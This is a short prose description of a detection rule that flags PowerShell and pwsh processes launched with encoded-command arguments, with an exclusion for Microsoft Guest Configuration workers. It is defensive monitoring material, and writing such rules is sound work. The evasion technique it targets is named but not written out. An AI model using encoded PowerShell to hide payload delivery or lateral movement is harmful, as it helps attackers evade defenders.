This detection rule is designed to identify potentially malicious usage of PowerShell and pwsh commands that leverage encoded command patterns, often utilized in malware infection workflows. The rule examines command lines for signs of PowerShell invocation, specifically looking for encoded commands, which may indicate evasion techniques common among attackers. The detection logic checks the process creation events for the presence of specific PowerShell executables (like powershell.exe and pwsh.exe) and filters command line arguments that are characteristic of encoded invocations. The rule employs a combination of selection criteria to raise an alert when these conditions are met, while also including a filter to ignore legitimate uses that are seen in certain Microsoft Guest Configuration worker processes. This rule aims to mitigate the risk of undetected lateral movement or payload delivery that can arise from encoded commands being executed in PowerShell, a tool often favored by attackers for its versatility and integration in the Windows environment.